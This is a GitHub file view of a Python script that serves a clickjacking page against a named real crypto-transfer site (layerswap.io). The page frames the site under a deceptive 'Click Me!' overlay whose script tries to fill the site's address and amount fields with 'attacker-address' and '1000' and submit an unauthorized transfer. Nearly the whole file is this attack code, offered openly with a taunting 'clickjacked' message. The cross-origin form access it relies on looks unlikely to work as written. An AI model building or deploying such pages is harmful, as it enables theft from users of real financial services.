-
Notifications
You must be signed in to change notification settings - Fork 0
/
layerclick2.py
94 lines (90 loc) · 2.76 KB
/
layerclick2.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
from http.server import BaseHTTPRequestHandler, HTTPServer
# HTML code for the clickjacking page
html_code = """
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Clickjacking Attack</title>
<style>
body {
margin: 0;
padding: 0;
overflow: hidden;
}
iframe {
position: absolute;
top: 0;
left: 0;
width: 100%;
height: 100%;
border: none;
z-index: 1;
}
.overlay {
position: absolute;
top: 0;
left: 0;
width: 100%;
height: 100%;
background: rgba(0, 0, 0, 0.5); /* semi-transparent background */
z-index: 2;
display: flex;
align-items: center;
justify-content: center;
}
.message {
color: white;
font-size: 24px;
text-align: center;
}
.button-container {
position: absolute;
top: 50%;
left: 50%;
transform: translate(-50%, -50%);
z-index: 3;
}
.button-container button {
padding: 10px 20px;
font-size: 18px;
cursor: pointer;
}
</style>
</head>
<body>
<iframe src="https://www.layerswap.io/app"></iframe>
<div class="overlay">
<div class="button-container">
<button onclick="redirect()">Click Me!</button>
</div>
</div>
<div class="message" id="message" style="display:none;">You have been clickjacked by DeadmanXXXII</div>
<script>
function redirect() {
// Simulate a form submission that leads to an unauthorized transfer of assets
document.querySelector('iframe').contentWindow.document.querySelector('input[name="address"]').value = 'attacker-address';
document.querySelector('iframe').contentWindow.document.querySelector('input[name="amount"]').value = '1000';
document.querySelector('iframe').contentWindow.document.querySelector('form').submit();
}
</script>
</body>
</html>
"""
# HTTP request handler class
class RequestHandler(BaseHTTPRequestHandler):
# Handle GET requests
def do_GET(self):
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
self.wfile.write(html_code.encode())
# Function to start the server
def start_server():
server_address = ('0.0.0.0', 8000)
httpd = HTTPServer(server_address, RequestHandler)
print('Server started on http://0.0.0.0:8000')
httpd.serve_forever()
if __name__ == "__main__":
start_server()